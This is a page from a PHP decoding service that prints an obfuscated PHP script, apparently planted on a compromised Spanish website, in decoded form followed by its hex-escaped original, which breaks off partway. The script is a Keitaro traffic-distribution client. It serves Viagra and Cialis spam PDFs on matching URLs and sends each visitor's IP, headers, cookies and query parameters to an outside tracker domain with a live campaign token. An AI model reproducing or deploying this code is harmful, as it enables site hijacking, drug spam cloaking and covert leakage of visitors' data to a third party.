Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto TBmE8; L_aY4: $client->param("\x73\x75\x62\137\x69\x64\x5f\x32", "\x67\x75\15..

Decoded Output download

<?php 
 goto TBmE8; L_aY4: $client->param("sub_id_2", "guia-abe.es"); goto jn5MR; aQl6d: class KClientError extends Exception { const ERROR_UNKNOWN = "UNKNOWN"; public function getHumanCode() { switch ($this->getCode()) { case CURLE_HTTP_RETURNED_ERROR: preg_match("/The requested URL returned error: (?'errorCode'\d+).*$/", $this->getMessage(), $matches); $errorCode = isset($matches["errorCode"]) ? $matches["errorCode"] : "HTTP_ERROR_" . self::ERROR_UNKNOWN; return "[REQ_ERR: {$errorCode}]"; case CURLE_UNSUPPORTED_PROTOCOL: return "[REQ_ERR: UNSUPPORTED_PROTOCOL]"; case CURLE_FAILED_INIT: return "[REQ_ERR: FAILED_INIT]"; case CURLE_URL_MALFORMAT: return "[REQ_ERR: BAD_URL]"; case CURLE_COULDNT_RESOLVE_PROXY: return "[REQ_ERR: COULDNT_RESOLVE_PROXY]"; case CURLE_COULDNT_RESOLVE_HOST: return "[REQ_ERR: COULDNT_RESOLVE_HOST]"; case CURLE_COULDNT_CONNECT: return "[REQ_ERR: COULDNT_CONNECT]"; case CURLE_PARTIAL_FILE: return "[REQ_ERR: PARTIAL_FILE]"; case CURLE_READ_ERROR: return "[REQ_ERR: READ_ERROR]"; case CURLE_OUT_OF_MEMORY: return "[REQ_ERR: OUT_OF_MEMORY]"; case CURLE_OPERATION_TIMEDOUT: return "[REQ_ERR: OPERATION_TIMEDOUT]"; case CURLE_HTTP_POST_ERROR: return "[REQ_ERR: HTTP_POST_ERROR]"; case CURLE_BAD_FUNCTION_ARGUMENT: return "[REQ_ERR: BAD_FUNCTION_ARGUMENT]"; case CURLE_TOO_MANY_REDIRECTS: return "[REQ_ERR: TOO_MANY_REDIRECTS]"; case CURLE_GOT_NOTHING: return "[REQ_ERR: GOT_NOTHING]"; case CURLE_SEND_ERROR: return "[REQ_ERR: SEND_ERROR]"; case CURLE_RECV_ERROR: return "[REQ_ERR: RECV_ERROR]"; case CURLE_BAD_CONTENT_ENCODING: return "[REQ_ERR: BAD_CONTENT_ENCODING]"; case CURLE_SSL_CACERT: case CURLE_SSL_CACERT_BADFILE: case CURLE_SSL_CERTPROBLEM: case CURLE_SSL_CIPHER: case CURLE_SSL_CONNECT_ERROR: case CURLE_SSL_ENGINE_NOTFOUND: case CURLE_SSL_ENGINE_SETFAILED: case CURLE_SSL_PEER_CERTIFICATE: case CURLE_SSL_PINNEDPUBKEYNOTMATCH: return "[REQ_ERR: SSL]"; case CURLE_OK: return ''; default: return "[REQ_ERR: " . self::ERROR_UNKNOWN . "]"; } } } goto K0otW; TBmE8: class KClient { const SESSION_SUB_ID = "sub_id"; const SESSION_LANDING_TOKEN = "landing_token"; const VERSION = 3; const STATE_SESSION_KEY = "keitaro_state"; const STATE_SESSION_EXPIRES_KEY = "keitaro_state_expires"; const DEFAULT_TTL = 1; const NOT_FOUND_STATUS = 404; private $_httpClient; private $_debug = false; private $_trackerUrl; private $_params = array(); private $_log = array(); private $_excludeParams = array("api_key", "token", "language", "ua", "ip", "referrer", "force_redirect_offer"); private $_result; private $_stateRestored; private $_sessionsDisabled = false; const ERROR = "[KTrafficClient] Something is wrong. Enable debug mode to see the reason."; public function __construct($trackerUrl, $token) { $this->trackerUrl($trackerUrl); $this->campaignToken($token); $this->version(self::VERSION); $this->param("info", 1); $this->fillParams(); } public function fillParams() { $referrer = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : null; $this->setHttpClient(new KHttpClient()); $host = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : null; $requestUri = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : null; $this->ip($this->_findIp())->ua(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : null)->language(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? substr($_SERVER["HTTP_ACCEPT_LANGUAGE"], 0, 2) : '')->xRequestedWith(isset($_SERVER["HTTP_X_REQUESTED_WITH"]) ? $_SERVER["HTTP_X_REQUESTED_WITH"] : null)->seReferrer($referrer)->referrer($referrer)->param("original_headers", $this->_getAllHeaders())->param("original_host", isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : "localhost")->param("original_method", isset($_SERVER["REQUEST_METHOD"]) ? $_SERVER["REQUEST_METHOD"] : "GET")->param("uri", (!empty($_SERVER["HTTPS"]) ? "https" : "http") . "://" . $host . $requestUri)->param("kversion", "3.4"); if ($this->isPrefetchDetected()) { $this->param("prefetch", 1); } } public function currentPageAsReferrer() { $this->referrer($this->_getCurrentPage()); return $this; } public function debug($state = true) { $this->_debug = $state; return $this; } public function seReferrer($seReferrer) { $this->_params["se_referrer"] = $seReferrer; return $this; } public function referrer($referrer) { $this->_params["referrer"] = $referrer; return $this; } public function xRequestedWith($xRequestedWith) { $this->_params["x_requested_with"] = $xRequestedWith; return $this; } public function setHttpClient($httpClient) { $this->_httpClient = $httpClient; return $this; } public function trackerUrl($trackerUrl) { if (!empty($trackerUrl)) { $request = parse_url($trackerUrl); $this->_trackerUrl = "{$request["scheme"]}://{$request["host"]}"; if (isset($request["port"])) { $this->_trackerUrl .= ":" . $request["port"]; } } } public function token($token) { return $this->campaignToken($token); } public function campaignToken($campaignToken) { $this->_params["token"] = $campaignToken; return $this; } public function version($version) { $this->_params["version"] = $version; return $this; } public function ua($ua) { $this->_params["ua"] = $ua; return $this; } public function language($language) { $this->_params["language"] = $language; return $this; } public function keyword($keyword) { $this->_params["keyword"] = $keyword; return $this; } public function forceRedirectOffer() { $this->_params["force_redirect_offer"] = 1; } public function ip($ip) { $this->_params["ip"] = $ip; return $this; } public function sendUtmLabels() { foreach ($_GET as $name => $value) { if (strstr($name, "utm_")) { $this->_params[$name] = $value; } } } public function setLandingToken($token) { $this->_startSession(); $_SESSION["token"] = $token; } public function getSubId() { $result = $this->performRequest(); if (empty($result->info->sub_id)) { $this->log("No sub_id is defined"); return "no_subid"; } $subId = $result->info->sub_id; return $subId; } public function getToken() { $result = $this->performRequest(); if (empty($result->info->sub_id)) { $this->log("No landing token is defined"); return "no_token"; } $subId = $result->info->token; return $subId; } public function sendAllParams() { foreach ($_GET as $name => $value) { if (empty($this->_params[$name]) && !in_array($name, $this->_excludeParams)) { $this->_params[$name] = $value; } } } public function restoreFromSession() { if ($this->isStateRestored() || $this->_sessionsDisabled) { return; } $this->_startSession(); if (!empty($_SESSION[self::STATE_SESSION_KEY])) { if ($_SESSION[self::STATE_SESSION_EXPIRES_KEY] < time()) { unset($_SESSION[self::STATE_SESSION_KEY]); unset($_SESSION[self::STATE_SESSION_EXPIRES_KEY]); $this->log("State expired"); } else { $this->_result = json_decode($_SESSION[self::STATE_SESSION_KEY], false); if (isset($this->_result) && isset($this->_result->headers)) { $this->_result->headers = array(); } $this->_stateRestored = true; $this->log("State restored"); } } } public function disableSessions() { $this->_sessionsDisabled = true; } public function restoreFromQuery() { if (isset($_GET["_subid"])) { $this->_stateRestored = true; if (empty($this->_result)) { $this->_result = new StdClass(); $this->_result->info = new StdClass(); } $this->_result->info->sub_id = $_GET["_subid"]; $this->log("SubId loaded from query"); if (isset($_GET["_token"])) { $this->_result->info->token = $_GET["_token"]; $this->log("Landing token loaded from query"); } $this->_storeState($this->_result, self::DEFAULT_TTL); $this->_stateRestored = true; } } public function isStateRestored() { return $this->_stateRestored; } public function isPrefetchDetected() { $checkServerParams = array("HTTP_X_PURPOSE" => "preview", "HTTP_X_MOZ" => "prefetch", "HTTP_X_FB_HTTP_ENGINE" => "Liger"); foreach ($checkServerParams as $name => $value) { if (isset($_SERVER[$name]) && $_SERVER[$name] == $value) { return true; } } return false; } public function saveCookie($key, $value, $ttl) { if (isset($_COOKIE[$key]) && $_COOKIE[$key] == $value) { return; } if (!headers_sent()) { setcookie($key, $value, $this->_getCookiesExpireTimestamp($ttl), "/", $this->_getCookieHost()); } $_COOKIE[$key] = $value; } public function param($name, $value) { if (!in_array($name, $this->_excludeParams)) { $this->_params[$name] = $value; } return $this; } public function params($value) { if (!empty($value)) { if (is_string($value)) { parse_str($value, $result); foreach ($result as $name => $value) { $this->param($name, $value); } } } return $this; } public function reset() { $this->_result = null; } public function performRequest() { if ($this->_result) { return $this->_result; } $request = $this->_buildRequestUrl(); $params = $this->getParams(); $options = $this->_getRequestOptions(); $this->log("Request: " . $request); try { $result = $this->_httpClient->request($request, $params, $options); $this->log("Response: " . $result); } catch (KClientError $e) { if ($this->_debug) { throw $e; } else { $errorCode = $e->getHumanCode(); $errorCode = $errorCode ? $errorCode . " " : ''; echo $errorCode . self::ERROR; return; } } $this->_result = json_decode($result); $this->_storeState($this->_result, isset($this->_result->cookies_ttl) ? $this->_result->cookies_ttl : null); if (isset($this->_result->cookies)) { $this->_saveKeitaroCookies($this->_result->cookies, $this->_result->cookies_ttl); } return $this->_result; } public function execute($break = false, $print = true) { $result = $this->performRequest(); $body = $this->_buildBody($result); if (!$print) { return $body; } $this->_sendHeaders($result); echo $body; } public function executeAndBreak() { $result = $this->performRequest(); $body = $this->_buildBody($result); $this->_sendHeaders($result); if (!empty($body)) { die($body); } if (!empty($result->headers) && ResponseExecutor::containsActionHeader($result->headers)) { die($body); } if (!empty($result->status) && $result->status == self::NOT_FOUND_STATUS) { die($body); } } public function getContent() { $result = $this->performRequest(); return $this->_buildBody($result); } public function showLog($separator = "<br />") { echo "<hr>" . implode($separator, $this->getLog()) . "<hr>"; } public function log($msg) { if ($this->_debug) { error_log($msg); } $this->_log[] = $msg; } public function getLog() { return $this->_log; } public function getParams() { return $this->_params; } private function _sendHeaders($result) { $file = ''; $line = ''; if (headers_sent($file, $line)) { $msg = "Body output already started"; if (!empty($file)) { $msg .= "({$file}:{$line})"; } $this->log($msg); return; } ResponseExecutor::sendHeaders($result); } private function _storeState($result, $ttl) { if ($this->_sessionsDisabled) { return; } $this->_startSession(); $_SESSION[self::STATE_SESSION_KEY] = json_encode($result); $_SESSION[self::STATE_SESSION_EXPIRES_KEY] = time() + $ttl * 60 * 60; if (!empty($result->info)) { if (!empty($result->info->sub_id)) { $_SESSION[self::SESSION_SUB_ID] = $result->info->sub_id; } if (!empty($result->info->token)) { $_SESSION[self::SESSION_LANDING_TOKEN] = $result->info->token; } } } private function _buildBody($result) { $content = ''; if (!empty($result)) { if (!empty($result->error)) { $content .= $result->error; } if (!empty($result->body)) { if (isset($result->contentType) && (strstr($result->contentType, "image") || strstr($result->contentType, "application/pdf"))) { $content = base64_decode($result->body); } else { $content .= $result->body; } } } return $content; } private function _saveKeitaroCookies($cookies, $ttl) { foreach ($cookies as $key => $value) { $this->saveCookie($key, $value, $ttl); } } public function getOffer($params = array(), $fallback = "no_offer") { $result = $this->performRequest(); $token = $this->getToken(); if (empty($token)) { $this->log("Campaign hasn't returned offer"); return $fallback; } $params["_lp"] = 1; $params["_token"] = $result->info->token; return $this->_buildOfferUrl($params); } public function isBot() { $result = $this->performRequest(); if (isset($result->info)) { return isset($result->info->is_bot) ? $result->info->is_bot : false; } } public function isUnique($level = "campaign") { $result = $this->performRequest(); if (isset($result->info) && $result->info->uniqueness) { return isset($result->info->uniqueness->{$level}) ? $result->info->uniqueness->{$level} : false; } } public function forceChooseOffer() { throw new \Error("forceChooseOffer was removed in KClient v3."); } public function getBody() { $result = $this->performRequest(); return $result->body; } public function getHeaders() { $result = $this->performRequest(); return $result->headers; } private function _startSession() { if (!headers_sent()) { @session_start(); } } private function _buildOfferUrl($params = array()) { $params = http_build_query($params); return "{$this->_trackerUrl}/?{$params}"; } private function _getCurrentPage() { if (isset($_SERVER["SERVER_PORT"]) && $_SERVER["SERVER_PORT"] == 443 || !empty($_SERVER["HTTPS"])) { $scheme = "https"; } else { $scheme = "http"; } return $scheme . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; } private function _buildRequestUrl() { return $this->_trackerUrl . "/click_api/v" . self::VERSION; } private function _findIp() { $ip = null; $headers = array("HTTP_X_FORWARDED_FOR", "HTTP_FORWARDED_FOR", "HTTP_X_FORWARDED", "HTTP_FORWARDED", "HTTP_CLIENT_IP", "HTTP_FORWARDED_FOR_IP", "X_FORWARDED_FOR", "FORWARDED_FOR", "X_FORWARDED", "FORWARDED", "CLIENT_IP", "FORWARDED_FOR_IP", "HTTP_CF_CONNECTING_IP", "HTTP_PROXY_CONNECTION"); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $tmp = explode(",", $_SERVER[$header]); $ip = trim($tmp[0]); break; } } if (strstr($ip, ",")) { $tmp = explode(",", $ip); if (stristr($_SERVER["HTTP_USER_AGENT"], "mini")) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (empty($ip)) { $ip = isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "127.0.0.1"; } return $ip; } private function _getCookiesExpireTimestamp($ttl) { return time() + 60 * 60 * $ttl; } private function _getCookieHost() { if (isset($_SERVER["HTTP_HOST"]) && substr_count($_SERVER["HTTP_HOST"], ".") < 3) { $host = "." . str_replace("www.", '', $_SERVER["HTTP_HOST"]); } else { $host = null; } return $host; } private function _getRequestOptions() { $opts = array(); if (isset($_SERVER["HTTP_COOKIE"])) { $opts["cookies"] = preg_replace("/PHPSESSID=.*?;/si", '', $_SERVER["HTTP_COOKIE"]); } return $opts; } private function _getAllHeaders() { $headers = array(); foreach ($_SERVER as $name => $value) { if (substr($name, 0, 5) == "HTTP_") { $headers[str_replace(" ", "-", ucwords(strtolower(str_replace("_", " ", substr($name, 5)))))] = $value; } } return $headers; } } goto CnHcT; K0otW: class_alias("KClient", "KClickClient"); goto K4KVi; JO9jw: $client->currentPageAsReferrer(); goto ivRv0; K4KVi: if (preg_match("/viagra/", $_SERVER["REQUEST_URI"])) { $file = "/var/www/vhosts/exlibrisediciones.com/guia-abe.es/files/pdf/comprar-viagra-en-linea-espania.pdf"; $tabl = "viagra"; } goto yobyI; EvGkt: $client->sendAllParams(); goto OKHAv; jn5MR: $client->param("sub_id_1", $tabl); goto JO9jw; lX0eE: header("Content-type: application/pdf"); goto iB3p_; yobyI: if (preg_match("/cialis/", $_SERVER["REQUEST_URI"])) { $file = "/var/www/vhosts/exlibrisediciones.com/guia-abe.es/files/pdf/comprar-cialis-online-en-farmacia-spain.pdf"; $tabl = "cialis"; } goto QjNoI; kEipm: class KHttpClient { const UA = "KHttpClient"; public function request($url, $params, $opts = array()) { if (!in_array("curl", get_loaded_extensions())) { return json_encode(array("error" => "Curl extension must be instsalled")); } $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_COOKIE, isset($opts["cookies"]) ? $opts["cookies"] : null); curl_setopt($ch, CURLOPT_NOBODY, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_USERAGENT, self::UA); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); curl_setopt($ch, CURLOPT_FAILONERROR, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $result = curl_exec($ch); if (curl_error($ch)) { throw new KClientError(curl_error($ch), curl_errno($ch)); } if (empty($result)) { throw new KClientError("Empty response"); } return $result; } } goto aQl6d; OKHAv: $client->forceRedirectOffer(); goto L_aY4; Q3GPN: @readfile($file); goto bS3mu; iB3p_: header("Content-Length: " . filesize($file)); goto eUsMp; CnHcT: class ResponseExecutor { public static function sendHeaders($result) { if (!empty($result->headers)) { foreach ($result->headers as $header) { if (!headers_sent()) { header($header); } } } if (!empty($result->status)) { static::_sendResponseCode($result->status); } if (!empty($result->contentType)) { $header = "content-type: " . $result->contentType; $headers[] = $header; if (!headers_sent()) { header($header); } } } public static function containsActionHeader($headers) { if (empty($headers)) { return false; } foreach ($headers as $header) { if (stripos($header, "Location:") === 0) { return true; } if (strstr($header, "404 Not Found")) { return true; } } return false; } private static function _sendResponseCode($code = null) { if ($code !== null) { switch ($code) { case 100: $text = "Continue"; break; case 101: $text = "Switching Protocols"; break; case 200: $text = "OK"; break; case 201: $text = "Created"; break; case 202: $text = "Accepted"; break; case 203: $text = "Non-Authoritative Information"; break; case 204: $text = "No Content"; break; case 205: $text = "Reset Content"; break; case 206: $text = "Partial Content"; break; case 300: $text = "Multiple Choices"; break; case 301: $text = "Moved Permanently"; break; case 302: $text = "Moved Temporarily"; break; case 303: $text = "See Other"; break; case 304: $text = "Not Modified"; break; case 305: $text = "Use Proxy"; break; case 400: $text = "Bad Request"; break; case 401: $text = "Unauthorized"; break; case 402: $text = "The license must be in Pro edition or higher"; break; case 403: $text = "Forbidden"; break; case 404: $text = "Not Found"; break; case 405: $text = "Method Not Allowed"; break; case 406: $text = "Not Acceptable"; break; case 407: $text = "Proxy Authentication Required"; break; case 408: $text = "Request Time-out"; break; case 409: $text = "Conflict"; break; case 410: $text = "Gone"; break; case 411: $text = "Length Required"; break; case 412: $text = "Precondition Failed"; break; case 413: $text = "Request Entity Too Large"; break; case 414: $text = "Request-URI Too Large"; break; case 415: $text = "Unsupported Media Type"; break; case 500: $text = "Internal Server Error"; break; case 501: $text = "Not Implemented"; break; case 502: $text = "Bad Gateway"; break; case 503: $text = "Service Unavailable"; break; case 504: $text = "Gateway Time-out"; break; case 505: $text = "HTTP Version not supported"; break; default: $text = ''; } $protocol = isset($_SERVER["SERVER_PROTOCOL"]) ? $_SERVER["SERVER_PROTOCOL"] : "HTTP/1.0"; header($protocol . " " . $code . " " . $text); } } } goto kEipm; ivRv0: $client->executeAndBreak(); goto lX0eE; eUsMp: header("Accept-Ranges: bytes"); goto Q3GPN; QjNoI: $client = new KClient("https://maketophotlove.com/", "75kgpqtrnkz6lmkxspsgdfspv3yf4xql"); goto EvGkt; bS3mu: ?>

Did this file decode correctly?

Original Code

<?php
 goto TBmE8; L_aY4: $client->param("\x73\x75\x62\137\x69\x64\x5f\x32", "\x67\x75\151\x61\55\141\x62\x65\56\145\163"); goto jn5MR; aQl6d: class KClientError extends Exception { const ERROR_UNKNOWN = "\125\x4e\113\x4e\117\127\x4e"; public function getHumanCode() { switch ($this->getCode()) { case CURLE_HTTP_RETURNED_ERROR: preg_match("\57\x54\x68\145\40\x72\145\x71\x75\x65\163\164\145\144\x20\x55\122\x4c\x20\x72\145\x74\165\x72\156\145\x64\40\145\162\x72\157\x72\x3a\40\x28\77\47\x65\x72\162\157\x72\103\157\x64\145\x27\x5c\x64\53\51\56\x2a\x24\57", $this->getMessage(), $matches); $errorCode = isset($matches["\x65\162\162\157\x72\x43\157\x64\x65"]) ? $matches["\145\x72\162\157\x72\x43\x6f\x64\x65"] : "\110\x54\x54\120\x5f\105\x52\122\x4f\122\x5f" . self::ERROR_UNKNOWN; return "\133\x52\105\x51\x5f\105\122\x52\x3a\x20{$errorCode}\x5d"; case CURLE_UNSUPPORTED_PROTOCOL: return "\x5b\122\x45\121\137\x45\122\x52\x3a\x20\x55\116\123\x55\120\x50\117\x52\x54\x45\x44\x5f\x50\x52\x4f\x54\x4f\103\117\114\x5d"; case CURLE_FAILED_INIT: return "\133\122\x45\x51\137\105\x52\122\72\x20\106\101\x49\114\105\x44\x5f\111\x4e\111\x54\x5d"; case CURLE_URL_MALFORMAT: return "\x5b\x52\105\x51\x5f\105\122\122\72\40\102\101\104\x5f\125\x52\x4c\135"; case CURLE_COULDNT_RESOLVE_PROXY: return "\133\122\105\121\x5f\105\122\x52\x3a\40\103\x4f\x55\x4c\104\x4e\124\x5f\x52\x45\123\117\114\126\x45\137\x50\122\117\130\131\x5d"; case CURLE_COULDNT_RESOLVE_HOST: return "\133\x52\105\x51\x5f\105\122\122\x3a\x20\x43\x4f\125\x4c\104\x4e\124\137\x52\x45\x53\x4f\114\x56\105\x5f\110\117\x53\124\x5d"; case CURLE_COULDNT_CONNECT: return "\x5b\x52\105\121\x5f\x45\122\x52\72\40\x43\117\x55\x4c\104\x4e\124\x5f\x43\117\116\x4e\105\103\x54\x5d"; case CURLE_PARTIAL_FILE: return "\133\122\105\x51\x5f\105\122\x52\x3a\x20\x50\101\122\x54\x49\x41\x4c\137\106\x49\x4c\105\x5d"; case CURLE_READ_ERROR: return "\x5b\122\x45\121\x5f\105\122\122\x3a\x20\122\105\101\104\x5f\x45\x52\x52\x4f\122\135"; case CURLE_OUT_OF_MEMORY: return "\133\x52\105\x51\137\x45\x52\x52\72\40\x4f\125\x54\x5f\x4f\106\x5f\115\x45\x4d\x4f\122\x59\x5d"; case CURLE_OPERATION_TIMEDOUT: return "\133\122\x45\121\137\x45\122\122\72\40\117\x50\x45\122\101\124\x49\117\x4e\137\124\111\x4d\x45\x44\x4f\125\x54\135"; case CURLE_HTTP_POST_ERROR: return "\133\122\x45\x51\137\105\122\122\72\40\x48\124\x54\120\x5f\x50\117\123\124\137\x45\x52\122\x4f\122\135"; case CURLE_BAD_FUNCTION_ARGUMENT: return "\133\x52\x45\121\137\x45\x52\x52\72\x20\102\101\x44\137\106\125\x4e\x43\x54\111\117\116\x5f\x41\x52\107\x55\x4d\105\116\x54\135"; case CURLE_TOO_MANY_REDIRECTS: return "\x5b\122\x45\121\x5f\x45\x52\x52\72\40\124\x4f\117\x5f\115\101\x4e\x59\137\122\x45\104\111\x52\105\103\x54\x53\135"; case CURLE_GOT_NOTHING: return "\x5b\x52\105\x51\137\x45\x52\122\x3a\40\107\117\x54\137\116\x4f\124\110\111\x4e\x47\x5d"; case CURLE_SEND_ERROR: return "\x5b\122\105\x51\x5f\105\x52\x52\72\40\x53\105\116\x44\x5f\105\x52\122\117\x52\x5d"; case CURLE_RECV_ERROR: return "\x5b\122\105\121\137\105\x52\122\72\x20\122\x45\103\x56\x5f\105\122\122\117\122\135"; case CURLE_BAD_CONTENT_ENCODING: return "\x5b\122\x45\121\x5f\105\x52\x52\x3a\40\102\101\104\x5f\x43\x4f\x4e\124\x45\116\124\x5f\x45\116\103\x4f\104\x49\116\x47\x5d"; case CURLE_SSL_CACERT: case CURLE_SSL_CACERT_BADFILE: case CURLE_SSL_CERTPROBLEM: case CURLE_SSL_CIPHER: case CURLE_SSL_CONNECT_ERROR: case CURLE_SSL_ENGINE_NOTFOUND: case CURLE_SSL_ENGINE_SETFAILED: case CURLE_SSL_PEER_CERTIFICATE: case CURLE_SSL_PINNEDPUBKEYNOTMATCH: return "\x5b\x52\x45\121\x5f\105\x52\x52\x3a\x20\123\x53\x4c\135"; case CURLE_OK: return ''; default: return "\133\x52\105\x51\x5f\105\122\122\x3a\x20" . self::ERROR_UNKNOWN . "\x5d"; } } } goto K0otW; TBmE8: class KClient { const SESSION_SUB_ID = "\163\165\x62\x5f\x69\144"; const SESSION_LANDING_TOKEN = "\x6c\141\156\x64\151\x6e\x67\137\164\157\153\x65\x6e"; const VERSION = 3; const STATE_SESSION_KEY = "\x6b\x65\x69\164\x61\x72\157\x5f\x73\x74\x61\164\x65"; const STATE_SESSION_EXPIRES_KEY = "\153\145\151\x74\x61\x72\157\137\x73\x74\141\164\x65\x5f\x65\x78\x70\x69\x72\145\163"; const DEFAULT_TTL = 1; const NOT_FOUND_STATUS = 404; private $_httpClient; private $_debug = false; private $_trackerUrl; private $_params = array(); private $_log = array(); private $_excludeParams = array("\x61\160\x69\137\153\145\171", "\164\157\153\x65\156", "\154\141\x6e\x67\165\141\147\145", "\x75\141", "\151\x70", "\162\x65\x66\145\x72\x72\145\162", "\x66\x6f\x72\143\x65\137\x72\145\144\x69\x72\145\x63\164\137\157\x66\146\145\x72"); private $_result; private $_stateRestored; private $_sessionsDisabled = false; const ERROR = "\x5b\x4b\124\162\x61\146\x66\x69\x63\x43\154\x69\x65\156\164\135\x20\123\157\x6d\x65\x74\x68\x69\x6e\x67\x20\x69\x73\x20\x77\x72\x6f\x6e\147\x2e\x20\105\x6e\x61\x62\x6c\x65\40\144\145\x62\165\147\x20\155\157\x64\145\x20\x74\157\x20\163\145\145\40\x74\150\x65\x20\x72\145\141\163\157\x6e\x2e"; public function __construct($trackerUrl, $token) { $this->trackerUrl($trackerUrl); $this->campaignToken($token); $this->version(self::VERSION); $this->param("\151\156\x66\157", 1); $this->fillParams(); } public function fillParams() { $referrer = isset($_SERVER["\110\124\124\x50\137\x52\105\106\x45\122\105\122"]) ? $_SERVER["\x48\x54\124\x50\x5f\x52\x45\x46\x45\x52\105\x52"] : null; $this->setHttpClient(new KHttpClient()); $host = isset($_SERVER["\110\124\x54\120\137\x48\x4f\x53\124"]) ? $_SERVER["\x48\124\x54\x50\137\110\x4f\123\x54"] : null; $requestUri = isset($_SERVER["\122\105\121\x55\x45\123\x54\137\125\122\x49"]) ? $_SERVER["\122\x45\121\x55\x45\x53\124\137\x55\x52\111"] : null; $this->ip($this->_findIp())->ua(isset($_SERVER["\x48\x54\x54\120\137\x55\x53\105\x52\x5f\101\107\105\x4e\124"]) ? $_SERVER["\x48\x54\x54\120\x5f\x55\123\105\x52\137\101\x47\105\116\x54"] : null)->language(isset($_SERVER["\110\x54\x54\120\x5f\x41\x43\x43\x45\120\x54\x5f\114\101\116\x47\125\101\x47\105"]) ? substr($_SERVER["\110\124\124\120\137\x41\103\x43\105\x50\x54\137\114\x41\x4e\107\x55\x41\107\x45"], 0, 2) : '')->xRequestedWith(isset($_SERVER["\110\124\x54\120\x5f\130\x5f\x52\105\x51\x55\x45\x53\124\105\x44\x5f\x57\x49\124\110"]) ? $_SERVER["\110\124\x54\120\x5f\130\137\x52\105\x51\125\105\x53\124\x45\104\x5f\x57\111\x54\110"] : null)->seReferrer($referrer)->referrer($referrer)->param("\157\x72\x69\x67\151\x6e\x61\154\x5f\150\145\x61\144\145\x72\163", $this->_getAllHeaders())->param("\x6f\162\x69\x67\151\x6e\x61\154\137\150\x6f\x73\x74", isset($_SERVER["\110\x54\124\120\137\x48\x4f\x53\124"]) ? $_SERVER["\110\124\124\x50\137\110\x4f\123\124"] : "\154\157\143\x61\x6c\x68\157\x73\x74")->param("\157\x72\151\x67\151\x6e\x61\x6c\137\x6d\145\x74\x68\157\144", isset($_SERVER["\122\x45\121\125\x45\123\x54\137\115\x45\x54\110\117\x44"]) ? $_SERVER["\122\105\x51\125\x45\x53\124\x5f\x4d\x45\x54\x48\x4f\104"] : "\x47\105\124")->param("\165\162\x69", (!empty($_SERVER["\110\124\124\120\x53"]) ? "\150\164\x74\x70\163" : "\x68\x74\x74\x70") . "\72\x2f\x2f" . $host . $requestUri)->param("\x6b\166\145\x72\x73\151\x6f\x6e", "\x33\56\64"); if ($this->isPrefetchDetected()) { $this->param("\x70\x72\145\146\x65\164\x63\150", 1); } } public function currentPageAsReferrer() { $this->referrer($this->_getCurrentPage()); return $this; } public function debug($state = true) { $this->_debug = $state; return $this; } public function seReferrer($seReferrer) { $this->_params["\163\x65\x5f\x72\x65\146\x65\162\x72\145\x72"] = $seReferrer; return $this; } public function referrer($referrer) { $this->_params["\162\x65\146\145\x72\162\x65\x72"] = $referrer; return $this; } public function xRequestedWith($xRequestedWith) { $this->_params["\x78\137\x72\x65\161\x75\x65\x73\164\145\x64\137\167\x69\164\150"] = $xRequestedWith; return $this; } public function setHttpClient($httpClient) { $this->_httpClient = $httpClient; return $this; } public function trackerUrl($trackerUrl) { if (!empty($trackerUrl)) { $request = parse_url($trackerUrl); $this->_trackerUrl = "{$request["\x73\x63\150\145\155\145"]}\x3a\57\x2f{$request["\150\x6f\163\164"]}"; if (isset($request["\x70\x6f\x72\x74"])) { $this->_trackerUrl .= "\72" . $request["\x70\157\162\164"]; } } } public function token($token) { return $this->campaignToken($token); } public function campaignToken($campaignToken) { $this->_params["\x74\157\153\145\156"] = $campaignToken; return $this; } public function version($version) { $this->_params["\x76\145\162\163\151\x6f\x6e"] = $version; return $this; } public function ua($ua) { $this->_params["\x75\141"] = $ua; return $this; } public function language($language) { $this->_params["\x6c\x61\156\147\165\x61\147\145"] = $language; return $this; } public function keyword($keyword) { $this->_params["\153\x65\x79\x77\x6f\x72\x64"] = $keyword; return $this; } public function forceRedirectOffer() { $this->_params["\146\x6f\162\x63\145\x5f\162\x65\144\x69\162\x65\x63\164\x5f\157\x66\x66\145\162"] = 1; } public function ip($ip) { $this->_params["\151\x70"] = $ip; return $this; } public function sendUtmLabels() { foreach ($_GET as $name => $value) { if (strstr($name, "\165\x74\x6d\137")) { $this->_params[$name] = $value; } } } public function setLandingToken($token) { $this->_startSession(); $_SESSION["\164\x6f\153\145\156"] = $token; } public function getSubId() { $result = $this->performRequest(); if (empty($result->info->sub_id)) { $this->log("\x4e\157\40\x73\165\142\137\151\x64\x20\x69\x73\40\144\145\x66\x69\x6e\x65\144"); return "\x6e\x6f\x5f\x73\165\142\151\144"; } $subId = $result->info->sub_id; return $subId; } public function getToken() { $result = $this->performRequest(); if (empty($result->info->sub_id)) { $this->log("\x4e\x6f\40\154\x61\156\144\151\x6e\x67\40\164\157\x6b\145\156\40\151\163\x20\x64\x65\146\151\x6e\x65\144"); return "\156\x6f\137\164\x6f\x6b\x65\x6e"; } $subId = $result->info->token; return $subId; } public function sendAllParams() { foreach ($_GET as $name => $value) { if (empty($this->_params[$name]) && !in_array($name, $this->_excludeParams)) { $this->_params[$name] = $value; } } } public function restoreFromSession() { if ($this->isStateRestored() || 